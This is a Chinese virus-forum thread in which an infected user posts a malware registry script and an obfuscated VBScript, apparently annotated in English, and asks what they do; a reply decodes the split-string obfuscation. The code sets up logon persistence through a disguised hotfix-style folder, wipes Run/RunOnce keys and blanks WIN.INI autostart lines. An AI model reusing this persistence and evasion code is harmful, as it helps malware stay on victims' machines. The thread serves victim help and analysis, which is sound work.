论坛: 病毒专区 标题: 一个病毒文件 复制本贴地址    
作者: zeng7071 [zeng7071]    论坛用户   登录
; Windows registry script. The file the "regedit -s" entries below import (WINSYS.cer) is
; presumably in this same format despite its extension; its contents are not shown on this page.
; .reg syntax as used here: "[-KEY]" deletes the whole key, "[KEY]" (re)creates it,
; "@=" sets the key's default (unnamed) value, and "name"=- deletes the value "name".
;
; 1. Wipe the per-user Run key and recreate it with a single default value. Deleting the key
;    also removes any legitimate per-user autostart entries that were in it.
[-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
; Autostart entry: "regedit -s" imports a registry file silently, so this re-applies the
; settings in WINSYS.cer at each logon. The $NtUninstall...$ folder name resembles the
; hotfix-uninstall folders Windows creates, presumably chosen to look legitimate.
@="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer"

; 2. Wipe the machine-wide RunOnce key and register the VBS quoted further down under "LogFeil".
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"LogFeil"="C:\\$NtUninstallQ8875736$\\WINSYS.vbs"

; 3. Machine-wide Run key: the two entries below are the ones that remain; every other value
;    listed after them is deleted ("=-"). The same names are written and deleted again by the
;    VBS further down; whether they belong to earlier variants of this family or to other
;    malware cannot be determined from this page.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"LogFeil"="regedit -s C:\\$NtUninstallQ8875736$\\WINSYS.cer"
; internat.exe is the name of the Windows input-locale indicator; a bare name with no path is
; presumably resolved through the search path at logon, so which file actually runs depends on
; the system -- verify the binary rather than trusting the name.
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
"W1N32"=-
"Abank"=-
"Ziplog"=-
"SystemServices"=-
"stup"=-
"Services"=-
"WJQ32"=-
"syslog"=-
; Detection/cleanup note: the observable artifacts are changes to the Run/RunOnce keys and
; regedit started with -s at logon. Removing the two "LogFeil" values, the HKCU Run default
; value and the C:\$NtUninstallQ8875736$ folder undoes the persistence this file sets up.


' WINSYS.vbs -- presumably the file registered under RunOnce\"LogFeil" in the registry script
' above (the page does not say so explicitly). It does three things:
'   1. writes two autostart values to HKLM\...\CurrentVersion\Run,
'   2. writes a list of other Run values as "12" and then deletes them again,
'   3. blanks the legacy "load=" / "run=" autostart lines in C:\WINDOWS\WIN.INI.
' ProgIDs and registry paths are assembled from string fragments ("WSc" + "ript.Sh" + "ell");
' that defeats naive string matching but does not change what runs -- concatenate the
' fragments before reading.
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
' mhk  = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
' mhc  = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\"
' mhk2 = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\"
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\"
' The only two values that survive to the end of the script -- the same entries the registry
' script above keeps. The value name "LogFeil" is what links the two files.
sss.RegWrite ""&mhk&"LogFeil","regedit -s C:\$NtUninstallQ8875736$\WINSYS.cer"
sss.RegWrite ""&mhk&"internat.exe","internat.exe"
' Every value from here down to "W1N32" is written as "12" and deleted again below (the HKCU
' value "my" goes away with its whole key). The net effect is that none of these names exists
' afterwards; why they are written first cannot be told from the script -- possibly leftovers
' of the author's edit history, possibly meant to overwrite entries of other variants first.
sss.RegWrite ""&mhk&"zwupdows","12"
sss.RegWrite ""&mhk&"win","12"
sss.RegWrite ""&mhk&"mwin","12"
sss.RegWrite ""&mhk&"internt","12"
sss.RegWrite ""&mhk&"Inernet","12"
sss.RegWrite ""&mhk&"Internet","12"
sss.RegWrite ""&mhk&"iexpleror","12"
sss.RegWrite ""&mhk&"zxdows","12"
sss.RegWrite ""&mhk&"qwe","12"
sss.RegWrite ""&mhk&"win1","12"
sss.RegWrite ""&mhk&"intelnat.exe","12"
sss.RegWrite ""&mhk&"u1888","12"
sss.RegWrite ""&mhk&"intenet","12"
sss.RegWrite ""&mhk&"9i5zxdows","12"
sss.RegWrite ""&mhk&"9i5com01zxdows","12"
sss.RegWrite ""&mhk&"99zxdows","12"
sss.RegWrite ""&mhk&"88zxdows","12"
sss.RegWrite ""&mhk&"Start Pagewin","12"
sss.RegWrite ""&mhk&"Start Page","12"
sss.RegWrite ""&mhk&"u188","12"
sss.RegWrite ""&mhk&"9i5comzxdows","12"
sss.RegWrite ""&mhk&"9q5zxdows","12"
sss.RegWrite ""&mhk&"u1881","12"
sss.RegWrite ""&mhk&"u1882","12"
sss.RegWrite ""&mhk&"u1883","12"
sss.RegWrite ""&mhk&"u1884","12"
sss.RegWrite ""&mhk&"u1885","12"
sss.RegWrite ""&mhk&"u1886","12"
sss.RegWrite ""&mhk&"u1887","12"
sss.RegWrite ""&mhk&"u88y", "12"
sss.RegWrite ""&mhk&"flash", "12"
sss.RegWrite ""&mhk&"999izxdows","12"
sss.RegWrite ""&mhk&"033zxdows","12"
sss.RegWrite ""&mhk&"syste","12"
' The one per-user value; the whole HKCU Run key is removed by the first RegDelete below.
sss.RegWrite ""&mhc&"my","12"
sss.RegWrite ""&mhk&"3zxdows","12"
sss.RegWrite ""&mhk&"88u88","12"
sss.RegWrite ""&mhk&"system","12"
sss.RegWrite ""&mhk&"8zxdows","12"
sss.RegWrite ""&mhk&"u18","12"
sss.RegWrite ""&mhk&"interneet.exe","12"
' A name ending in "\" addresses a key, so this sets the default value of HKLM\...\RunOnce.
sss.RegWrite ""&mhk2&"RunOnce\", "12"
sss.RegWrite ""&mhk&"iexpler", "12"
sss.RegWrite ""&mhk&"u1810", "12"
sss.RegWrite ""&mhk&"winwin", "12"
sss.RegWrite ""&mhk&"WIN32", "12"
sss.RegWrite ""&mhk&"W1N32", "12"
' Trailing "\" again: this deletes the entire HKCU Run key, including any legitimate per-user
' autostart entries the user had.
sss.RegDelete ""&mhc&""
' Registry value names are case-insensitive, so "inernet" below matches the "Inernet" written above.
sss.RegDelete ""&mhk&"zwupdows"
sss.RegDelete ""&mhk&"win"
sss.RegDelete ""&mhk&"mwin"
sss.RegDelete ""&mhk&"internt"
sss.RegDelete ""&mhk&"inernet"
sss.RegDelete ""&mhk&"Internet"
sss.RegDelete ""&mhk&"u188"
sss.RegDelete ""&mhk&"iexpleror"
sss.RegDelete ""&mhk&"zxdows"
sss.RegDelete ""&mhk&"qwe"
sss.RegDelete ""&mhk&"win1"
sss.RegDelete ""&mhk&"intelnat.exe"
sss.RegDelete ""&mhk&"intenet"
sss.RegDelete ""&mhk&"9i5zxdows"
sss.RegDelete ""&mhk&"9i5com01zxdows"
sss.RegDelete ""&mhk&"99zxdows"
sss.RegDelete ""&mhk&"88zxdows"
sss.RegDelete ""&mhk&"Start Pagewin"
sss.RegDelete ""&mhk&"Start Page"
sss.RegDelete ""&mhk&"9i5comzxdows"
sss.RegDelete ""&mhk&"9q5zxdows"
sss.RegDelete ""&mhk&"999izxdows"
sss.RegDelete ""&mhk&"033zxdows"
sss.RegDelete ""&mhk&"u1881"
sss.RegDelete ""&mhk&"u1882"
sss.RegDelete ""&mhk&"u1883"
sss.RegDelete ""&mhk&"u1884"
sss.RegDelete ""&mhk&"u1885"
sss.RegDelete ""&mhk&"u1886"
sss.RegDelete ""&mhk&"u1887"
sss.RegDelete ""&mhk&"u88y"
sss.RegDelete ""&mhk&"flash"
sss.RegDelete ""&mhk&"88u88"
sss.RegDelete ""&mhk&"interneet.exe"
sss.RegDelete ""&mhk&"u18"
sss.RegDelete ""&mhk&"u1888"
sss.RegDelete ""&mhk&"system"
sss.RegDelete ""&mhk&"3zxdows"
sss.RegDelete ""&mhk&"8zxdows"
sss.RegDelete ""&mhk&"syste"
' Deletes the whole HKLM RunOnce key, not just its default value -- any pending RunOnce
' entries, including the "LogFeil" one the registry script installs there, are lost.
sss.RegDelete ""&mhk2&"RunOnce\"
sss.RegDelete ""&mhk&"iexpler"
sss.RegDelete ""&mhk&"u1810"
sss.RegDelete ""&mhk&"winwin"
sss.RegDelete ""&mhk&"WIN32"
sss.RegDelete ""&mhk&"W1N32"

' Second part: rewrite C:\WINDOWS\WIN.INI. In its [windows] section, "load=" and "run=" are
' legacy autostart lines; the code below leaves them present but empties them. Everything is
' skipped when the file does not exist.
Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI")
if myfile14 then
set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI")
mywin=FSO2.ReadALL()
' Instr gives 1-based offsets, 0 when not found (so l/m/n go negative and the checks below
' fail). The -3 / -1 adjustments make Read(l) and Read(n) stop before the line break that
' precedes "run=" / "NullPort=", and Read(m) stop right before "load=". This assumes each
' marker starts a line preceded by CR LF; Instr matches the first occurrence anywhere in the
' file and is case-sensitive.
l=Instr(mywin,"run=")-3
m=Instr(mywin,"load=")-1
n=Instr(mywin,"NullPort=")-3
FSO2.close
' Only rewrite when both "load=" and "run=" are present and "run=" comes after "load=".
if l>0 and m>0 and l>m then
' The prefixes are obtained by re-opening the file and reading l / m characters rather than
' by slicing mywin.
set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI")
' mywin2: everything before the line break ahead of "run=" (only used in the else branch).
mywin2=FSO3.Read(l)
FSO3.close
set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI")
' mywin3: everything before "load=".
mywin3=FSO4.Read(m)
FSO4.close
' Case A: "NullPort=" follows "run=". Drop everything before the line break ahead of
' "NullPort=", then write <prefix up to load=> "load=" CR LF "run=" <CR LF NullPort=...rest>.
' Result: the original load= and run= lines (and whatever values they carried) are replaced
' by empty ones.
if n>0 and n>l then
set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI")
mywin4=FSO5.Read(n)
FSO5.close
' Replace removes every occurrence of the prefix text; for the file head only the leading
' occurrence is expected.
mywin=Replace(mywin,mywin4,"")
' CreateTextFile with the overwrite argument omitted; the runtime's default is expected to
' allow replacing the existing WIN.INI -- confirm on the target system.
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.WriteLine "load="
FSO2.Write "run="
FSO2.Write mywin
FSO2.close
else
' Case B: no "NullPort=" after "run=". Drop everything before the line break ahead of "run=",
' then write <prefix up to load=> "load=" <CR LF run=...rest>. Result: only the load= line is
' emptied; the run= line is kept as it was.
mywin=Replace(mywin,mywin2,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.Write "load="
FSO2.Write mywin
FSO2.close
end if
end if
end if
' Detection note: the observable behaviour is wscript.exe writing HKLM\...\Run values and
' rewriting win.ini; both are worth alerting on regardless of the value names involved.
能不能帮解释一下这个代表什么呢？我知道上面的那些，作用都是在启动过程中加载我中毒的那些文件，可是后面的就看不懂了，帮忙解释一下好吗？


地主 发表时间: 04-05-18 09:56

回复: hackgou [hackgou]   论坛用户   登录
一楼的兄弟主要说的是:
sss和fso1,fso2,fso3这几个对象吧。
先看看:
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
这就相当于 Set sss = CreateObject("WScript.Shell")。这下就简单了吧，写这个脚本的人多半是为了躲避防火墙的检测才故意绕的这个弯。
然后用
sss.RegWrite ""&mhk&"W1N32", "12"
sss.RegDelete ""&mhc&""
来操作注册表。

至于fso1,fso2,fso3也是类似的:
Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
就等于:
Set FSO = CreateObject("Scripting.FileSystemObject")
然后来使用FSO读写文件系统。


B1层 发表时间: 04-05-18 11:10

回复: zeng7071 [zeng7071]   论坛用户   登录
; Quoted from the first post: the value list of the registry script, without the key header
; it sits under ([HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]).
; .reg syntax: "name"="data" creates or overwrites the value; "name"=- deletes the value
; from the key the line appears under. So the first line keeps an autostart entry and every
; following line removes one.
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
"W1N32"=-
"Abank"=-
"Ziplog"=-
"SystemServices"=-
"stup"=-
"Services"=-
"WJQ32"=-
"syslog"=-
谢谢楼上的朋友。那这些呢？这些后面用"-"的作用是什么呢？

B2层 发表时间: 04-05-19 11:43
